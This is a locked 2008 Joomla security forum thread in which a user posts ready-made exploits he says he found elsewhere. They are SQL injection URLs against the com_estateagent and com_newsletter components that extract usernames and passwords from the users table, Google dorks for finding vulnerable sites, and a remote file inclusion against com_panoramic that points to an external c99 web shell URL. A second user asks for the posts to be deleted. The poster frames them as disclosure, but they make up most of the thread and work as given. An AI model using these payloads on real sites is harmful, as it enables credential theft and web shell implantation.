ADMINS - Joomla exploits

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
Spiguy
Joomla! Apprentice
Joomla! Apprentice
Posts: 23
Joined: Sat Feb 23, 2008 11:20 pm

ADMINS - Joomla exploits

Post by Spiguy » Sat Feb 23, 2008 11:26 pm

Let me caveat this by saying...this is something I found not something I made. I am not sure what version this would affect. I am new to Joomla also:
1st exploit
###############################
#
# joomla SQL Injection(com_estateagent)
#
################################
#
# DorK 1 : allinurl: allinurl: "com_estateagent"
#
################################
EXPLOIT :

index.php?option=com_estateagent&Itemid=S@BUN&func =showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/fr om/**/mos_users/*&results=S@BUN

2nd Exploit:
###############################
#
# joomla SQL Injection(com_newsletter)
#
###############################
#
# DorKs 1 : allinurl: "com_newsletter"
#
###############################
EXPLOIT :
#
# index.php?#option=com_newsletter&Itemid=S@BUN&list id=9999999/**/union/**/select/**/name,password/**/ from/**/mos_users/*
###############################

Spiguy
Joomla! Apprentice
Joomla! Apprentice
Posts: 23
Joined: Sat Feb 23, 2008 11:20 pm

Re: ADMINS - Joomla exploits

Post by Spiguy » Sat Feb 23, 2008 11:48 pm

Found another:
============================================

# panoramic joomla component 1.0 Remote File Include Vulnerability

Component : com_panoramic version 1.0

=============================================

Exploit


http://localhost/path/administrator/... ... =[evilcode]


# google dork

inurl:com_panoramic

Evilcode is a c99(shell) site.
http://www.freewebs.com/itpentaoix/c99.txt << evilcode
========================================

User avatar
fantastic
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 143
Joined: Sun Nov 19, 2006 1:33 pm
Contact:

Re: ADMINS - Joomla exploits

Post by fantastic » Sun Feb 24, 2008 12:06 am

Admins, delete these posts.

Spiguy
Joomla! Apprentice
Joomla! Apprentice
Posts: 23
Joined: Sat Feb 23, 2008 11:20 pm

Re: ADMINS - Joomla exploits

Post by Spiguy » Sun Feb 24, 2008 12:13 am

I was trying to help...I couldnt find anywhere to email them to people or I would have.


Locked

Return to “Security in Joomla! 1.5”